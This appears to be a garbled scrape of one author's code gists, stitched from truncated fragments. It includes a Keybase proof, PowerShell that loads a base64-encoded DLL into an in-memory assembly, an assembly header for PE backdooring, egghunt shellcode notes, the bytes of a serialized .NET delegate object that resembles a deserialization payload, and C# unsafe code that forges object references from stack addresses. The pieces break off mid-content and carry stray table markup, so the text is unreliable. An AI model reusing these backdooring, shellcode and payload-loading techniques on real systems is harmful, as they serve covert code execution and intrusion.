I hereby claim:
- I am tophertimzen on github.
- I am ttimzen (https://keybase.io/ttimzen) on keybase.
- I have a public key ASDujVwoiebsWPA5e5Xk4wd9blw29002bROa67GXKNbZ5Qo
To claim this, I am signing this object:
# Build a throw-away dynamic assembly in the current AppDomain. AssemblyBuilderAccess::Run
# makes it executable in memory only; nothing is persisted to disk.
$Domain = [System.AppDomain]::CurrentDomain
$DynAssembly = New-Object -TypeName System.Reflection.AssemblyName -ArgumentList 'TempAssembly'
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# A second, stub module that the in-memory module (i.e. this mimics the loading of a netmodule
# at runtime) will be loaded into. It is defined here but not otherwise used in these lines.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [System.Reflection.TypeAttributes]::Public)
# CreateType() bakes TempClass; the resulting Type is deliberately left on the pipeline (it is
# not assigned), so the script emits it as output just as before.
$TypeBuilder.CreateType()
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
| ; Topher Timzen | |
| ; Messing around with PE backdooring for CTP/OSCE and wanted to make a new thread inside the process to avoid synchronization issues. | |
| ; Tons of NULL as I used this in a PE directly, no need to avoid them. | |
| ; nasm CreateThread.asm -o CreateThread.raw; xxd -p CreateThread.raw | tr -d '\n' | |
; Flat 32-bit code in the .text section; _start is exported so the raw output can be located/linked.
bits 32
section .text
global _start
| ''' | |
| HeapWalker - Walking Windows 7 process heaps using pydbg | |
| Author : Debasish Mandal | |
| Blog :http://www.debasish.in/ | |
| Twitter : https://twitter.com/debasishm89 | |
| Description : This Python script is the simplest implementation of the Windows HeapWalk() API. | |
| It uses pydbg and allows the user to walk through the debuggee process's heaps on the fly. |
| /* | |
| * Optimized egghunt shellcode for win32 (32 bytes) | |
| * | |
| * Credits: http://www.hick.org/~mmiller/shellcode/win32/egghunt_syscall.c | |
| * | |
| * Description | |
| * | |
| * This code works by abusing an NT syscall (NtAccessCheckAndAuditAlarm) | |
| * whereby it uses the kernel to validate whether or not a set of addresses | |
| * is valid, and, if it is, whether or not they match the 8 byte egg we're |
| var serialized_obj = [ | |
| 0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108, | |
| 101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108, | |
| 101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46, | |
| 68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101, | |
| 103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105, | |
| 122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77, | |
| 101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0, |
I hereby claim:
To claim this, I am signing this object:
/// <summary>
/// Produces an object reference from a raw address by overwriting a neighbouring stack slot.
/// NOTE(review): this depends on the JIT placing the local <c>refer</c> in the machine word
/// directly below <c>pointer</c>; that frame layout is undocumented and not guaranteed (an
/// optimising JIT may enregister or reorder locals) — TODO confirm on the targeted
/// runtime and build configuration. Not memory-safe; requires unsafe blocks enabled.
/// </summary>
/// <param name="ptrIN">Address to be reinterpreted as an object reference.</param>
/// <returns>
/// Whatever <c>refer</c> holds after the stack write — on the assumed layout, the object
/// located at <paramref name="ptrIN"/>.
/// </returns>
public static object GetInstance(IntPtr ptrIN)
{
    // Placeholder reference-typed local: its initial value (the Type of IntPtr) is never used
    // as such; it only has to occupy a stack slot next to 'pointer'.
    object refer = ptrIN.GetType();
    IntPtr pointer = ptrIN;
    unsafe
    {
        // Copy the value of 'pointer' into the slot one IntPtr below it (presumably 'refer').
        *(&pointer - 1) = *(&pointer);
    }
    return refer;
}
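/// <summary>
/// Returns the raw address of <paramref name="wantedObject"/> by reading it back out of a
/// stack slot. Nothing here pins the object, so the GC is free to relocate it at any time
/// after this returns; the value is only meaningful as a momentary snapshot.
/// NOTE(review): relies on the argument being stored three machine words below the local
/// <c>objectPointer</c>; that frame layout is undocumented and build/JIT dependent — TODO
/// confirm on the targeted runtime. Not memory-safe; requires unsafe blocks enabled.
/// </summary>
/// <param name="wantedObject">Object whose address is wanted.</param>
/// <returns>The IntPtr read from that stack slot; on the assumed layout, the object's address.</returns>
public static IntPtr getObjectAddr(object wantedObject)
{
    // Arbitrary seed value; the local only exists so that its address anchors the read below.
    IntPtr objectPointer = (IntPtr)5;
    // Lowercase keyword: 'Unsafe' is not a C# keyword and the original did not compile.
    unsafe
    {
        // Read the slot 3 IntPtr-sized words below the local. The former
        // 'objectPointer = ...' assignment was dead (the local is never read again),
        // so the value is returned directly.
        return *(&objectPointer - 3);
    }
}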
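// Resolve the target type and its public parameterless constructor via reflection.
Type reference = typeof(GrayFrost.testClass);
ConstructorInfo ctor = reference.GetConstructor(Type.EmptyTypes);
// GetConstructor returns null (no exception) when no such constructor exists; fail with a
// clear message instead of a NullReferenceException on the Invoke below.
if (ctor == null)
{
    throw new InvalidOperationException("Type " + reference.FullName + " has no public parameterless constructor.");
}
object wantedObject = ctor.Invoke(new object[0]);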